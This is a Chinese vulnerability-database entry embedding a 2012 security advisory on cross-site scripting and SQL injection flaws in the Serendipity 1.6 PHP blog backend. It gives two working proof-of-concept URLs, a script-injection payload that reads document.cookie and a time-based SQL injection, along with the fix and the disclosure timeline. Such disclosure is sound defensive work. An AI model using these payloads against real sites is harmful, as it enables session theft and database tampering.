Serendipity输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121112 漏洞类型 跨站脚本
发布时间 2012-05-08 更新时间 2012-06-07
CVE编号 CVE-2012-2331 CNNVD-ID CNNVD-201205-155
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/18884
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201205-155
|漏洞详情
Serendipity是Serendipity团队开发的一套基于PHP的博客系统。该系统支持创建在线日记、博客、网页等。Serendipity中存在SQL注入漏洞和跨站脚本漏洞。攻击者可利用这些漏洞执行任意脚本代码,盗取基于cookie的认证证书,操控应用程序,访问或修改数据,或在底层数据库中利用这些漏洞。Serendipity1.6.1版本中存在这些漏洞,其他版本也可能受到影响。
|漏洞EXP
Advisory:		Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability
Advisory ID:		KORAMIS-ADV2012-001
Contact:		security@koramis.de
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Serendipity 1.6
Vendor URL:		http://www.s9y.org
Vendor Status:		fixed
CVE-ID:			CVE-2012-2331,CVE-2012-2332

==========================
Vulnerability Description:
==========================

The Serendipity backend is prone to a Cross-Site Scripting and SQL-Injection vulnerability.

==================
Technical Details:
==================

# Cross Site-Scripting (CVE-2012-2331)
http://[target]/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='"</script><script>alert(document.cookie)</script>

# SQL-Injection (CVE-2012-2332)
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+

=========
Solution:
=========

Upgrade to version 1.6.1

====================
Disclosure Timeline:
====================

21-Apr-2012 - informed developers
22-Apr-2012 - feedback from developer
08-May-2012 - fixed in version 1.6.1

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team).

===========
References:
===========

http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html
|参考资料

来源:github.com
链接:https://github.com/s9y/Serendipity/commit/264bf55719baacc069ff9d3cc35f0c349cde11e3
来源:BID
名称:53418
链接:http://www.securityfocus.com/bid/53418
来源:www.rul3z.de
链接:http://www.rul3z.de/index.php?/214-KORAMISADV2012-001-Serendipity-1.6-Backend-Cross-Site-Scripting-and-SQL-Injection-vulnerability.html
来源:MLIST
名称:[oss-security]20120508Re:CVErequest:XSSandSQLinjectioninserendipitybefore1.7.1
链接:http://www.openwall.com/lists/oss-security/2012/05/09/2
来源:MLIST
名称:[oss-security]20120508CVErequest:XSSandSQLinjectioninserendipitybefore1.7.1
链接:http://www.openwall.com/lists/oss-security/2012/05/08/6
来源:www.koramis.com
链接:http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
来源:SECUNIA
名称:49009
链接:http://secunia.com/advisories/49009
来源:blog.s9y.org
链接:http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html
来源:BUGTRAQ
名称:20120508Serendipity1.6BackendCross-SiteScriptingandSQL-Injectionvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2012-05/0037.html